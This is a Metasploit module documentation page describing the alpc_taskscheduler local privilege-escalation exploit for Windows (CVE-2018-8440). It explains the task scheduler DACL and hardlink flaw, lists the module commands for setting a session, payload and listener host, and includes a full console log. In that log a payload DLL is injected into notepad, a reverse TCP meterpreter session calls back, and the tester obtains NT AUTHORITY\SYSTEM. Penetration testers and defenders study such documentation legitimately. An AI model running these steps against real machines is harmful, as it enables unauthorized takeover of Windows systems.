adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
42ccc37bcad1c19fa2019e2bf00366db423bbb5e
metasploit-gs/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
T
Jacob Robles 42ccc37bca Added description to module
2018-09-19 10:22:51 -05:00

60 lines
2.5 KiB
Markdown
Raw Blame History

## Description
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file. This module has been tested against Windows 10 Pro x64.
## Vulnerable Application
Windows OSes without [KB4457142 patch](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440)
## Verification Steps
* Get a meterpreter session on Windows 10 x64
* `use exploit/windows/local/alpc_taskscheduler`
* `set session <session>`
* `set payload <payload>`
* `set lhost <lhost>`
* `run`
* Get a session as SYSTEM
## Scenarios
### Tested on Windows 10 Pro Version 1803 x64
```
msf5 exploit(windows/local/alpc_taskscheduler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR 172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)
msf5 exploit(windows/local/alpc_taskscheduler) > run
[*] Started reverse TCP handler on 172.22.222.243:4444
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink